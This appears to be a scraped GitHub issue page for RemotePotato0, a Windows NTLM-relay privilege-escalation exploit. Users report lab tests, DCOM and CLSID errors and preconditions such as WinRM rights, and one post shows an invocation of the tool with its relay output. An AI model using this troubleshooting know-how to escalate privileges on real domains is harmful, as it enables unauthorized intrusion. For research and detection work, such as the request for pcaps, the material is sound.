antoniococo / remotepotato0 Goto Github PK

Hello!

I've been reading the tech papers about this exploit and, admittedly, it caused my brain to leak out of my ears and onto my keyboard :-)

So I staged up a test DC, joined some Win10 machines to it and looked to recreate the exploit in action. It worked as advertised, which was awesome! However, I found that by default the average/default AD user doesn't have WinRm capability into anything in my server subnet, so I had to explicitly add my test user (Student10) into the Remote Management Users group. Once I did that and ran RemotePotato0, the fireworks flew:

So my newb question is: do you think in most AD environments this exploit is slightly less of a threat unless the admins have specifically configured a bunch of users/groups to have WinRm/SSH privs? Or is it a "I'm not doing it right" kind of situation where I can leverage RemotePotato0 in more common configuration scenarios?

Thanks!
Brian

OS：Windows Server 2012
[*] IStoragetrigger written: 110 bytes
[!] Error. Trigger DCOM failed with status: 0x80040154

when i use the prog to test my machine its exception:
[!] Error. Trigger DCOM failed with status: 0x800706ba
how do deal with it

The RPC capture server in charge to grab the ntlmv2 response is using the hardcoded value 268 to hold the data. While there are no particular bugs found on the tested windows, it could have some bugs for win11 and server 2022.
The allocation should be dynamically managed with a malloc() call instead of using a local array with fixed size --> https://github.com/antonioCoco/RemotePotato0/blob/main/RPCCaptureServer.cpp#L168

Can you share the pcaps from your blog post please to help defenders generate detections?

Thanks in advance.

On windows server prior to 2019 version the JuicyPotato trigger (the one not requiring an external oxid resolution) does not work anymore. It seems that at certain point in time MS has backported the fix of win serv 2019 to the older versions.

See --> https://twitter.com/decoder_it/status/1493916092493877248

A fix should be to use an external oxid resolver like it's already happening for windows server 2019.

is this attack possible only when the domain admin is logged in with you on the local server? or does it work even if the Admin is only logged in on the Domain Controller?

I am attempting to use this and I got the following output on the user machine.

C:\Users\user\Documents>.\RemotePotato0.exe -r 10.1.1.69 -p 1111
[*] Starting the NTLM relay attack, remember to forward tcp port 135 on 10.1.1.69 to your victim machine on port 1111 before and to launch ntlmrelayx on 10.1.1.69!!
[*] RPC relay server listening on port 9997 ...
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 1111 ...
[*] IStoragetrigger written: 104 bytes
[!] Error. CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54} not found. Bad path to object.

The user machine is Windows 2016 Standard (build:14393). Do I have to use a different CLSID?

OS: windows server 2016
Relaying failed

RPCSocketListen receive nothing